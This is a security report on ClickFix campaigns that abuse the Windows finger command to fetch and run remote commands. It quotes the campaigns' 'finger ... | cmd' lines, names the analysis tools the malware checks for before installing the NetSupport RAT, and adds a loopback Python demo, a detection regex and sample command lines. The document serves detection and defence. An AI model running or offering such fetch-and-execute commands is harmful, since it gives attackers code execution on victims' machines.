Threat actors have resurrected the decades-old "finger" command as a remote command execution channel in new ClickFix malware attacks. A batch file was identified running "finger root@finger.nateams[.]com" to retrieve commands from the attacker's finger server and execute them through cmd.exe. Further investigation uncovered a ClickFix campaign using the command "finger Kove2@api.metrics-strange.com | cmd", which pipes whatever text the remote finger server returns straight into a command interpreter; a similar campaign had been reported previously.

This intrusion was more sophisticated: the retrieved commands first check the host for malware analysis tools, including WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere. Only if none are found does the chain proceed, loading a ZIP archive disguised as a PDF and extracting the NetSupport Manager RAT package from it.

Because finger.exe is a legitimate Windows binary, the most reliable mitigation is to block outgoing traffic to TCP port 79, the finger service port, at the host and perimeter firewalls; organizations that have no business use for finger should also treat any finger.exe process creation as suspicious.
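To make clear why "finger user@host | cmd" works as a delivery channel, and what a detection for it looks like, here is an added example that is not part of the original report. The finger protocol (RFC 1288) has the client connect to TCP/79, send the queried name followed by CRLF, and read free-form text until the server closes the connection; nothing constrains that text, so piping it into cmd executes it. The loopback server, the response text, and every hostname and command line below are constructed placeholders, not the campaign's infrastructure or real telemetry.

```python
"""Finger as a command-delivery channel (loopback demo) plus a command-line detector.

The server here is a constructed stand-in that returns inert text. In the abuse
described above, the server's reply would be the attacker's cmd.exe script.
"""
import re
import socket
import threading

# Constructed response: harmless echo lines standing in for attacker commands.
CONSTRUCTED_RESPONSE = b"echo finger-delivered line 1\r\necho finger-delivered line 2\r\n"


def serve_once(listener: socket.socket) -> bytes:
    """Accept one finger query, return the constructed text, close. Returns the query."""
    conn, _ = listener.accept()
    with conn:
        query = b""
        while not query.endswith(b"\r\n"):  # RFC 1288: the request ends with CRLF
            chunk = conn.recv(256)
            if not chunk:
                break
            query += chunk
        conn.sendall(CONSTRUCTED_RESPONSE)  # free-form text, no structure imposed
    return query


def finger(user: str, host: str, port: int = 79) -> str:
    """Minimal finger client: the same exchange finger.exe performs before cmd runs the output."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(user.encode("ascii") + b"\r\n")
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:  # server closes the connection when the reply is complete
                break
            data += chunk
    return data.decode("ascii", errors="replace")


def demo_exchange() -> tuple[bytes, str]:
    """Run client and server on 127.0.0.1; returns (query the server saw, text the client got)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))  # ephemeral port instead of 79 so no privileges are needed
    listener.listen(1)
    port = listener.getsockname()[1]
    seen = {}
    t = threading.Thread(target=lambda: seen.setdefault("query", serve_once(listener)))
    t.start()
    text = finger("anyuser", "127.0.0.1", port)
    t.join()
    listener.close()
    return seen["query"], text


# Detection over process-creation command lines (Sysmon Event ID 1 or 4688 CommandLine):
# finger invoked with a user@host target and its output piped into an interpreter.
_FINGER_PIPE = re.compile(
    r"\bfinger(?:\.exe)?\s+\S+@\S+.*?\|\s*(?:cmd|powershell|pwsh)\b",
    re.IGNORECASE,
)


def is_finger_abuse(cmdline: str) -> bool:
    """True when the command line matches the finger-piped-to-interpreter pattern."""
    return bool(_FINGER_PIPE.search(cmdline))


# Constructed sample command lines with expected verdicts (placeholder hosts, not real IOCs).
SAMPLES = [
    ('cmd.exe /c "finger user1@finger.example.test | cmd"', True),
    ("finger root@finger.example.test | cmd", True),
    ("finger.exe bob@shell.example.internal", False),  # plain query, nothing executed
    ("ping -n 4 192.0.2.1", False),
]

if __name__ == "__main__":
    query, text = demo_exchange()
    print("server saw query:", query)
    print("client received:\n" + text)
    for line, _expected in SAMPLES:
        print(is_finger_abuse(line), line)
```

The regex deliberately requires the "user@host" form: a bare "finger" against the local host returns nothing an attacker controls, while the pipe into cmd or PowerShell is what turns a lookup into execution. Pair the detection with the TCP/79 egress block, since a blocked connection leaves the piped cmd with nothing to run.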

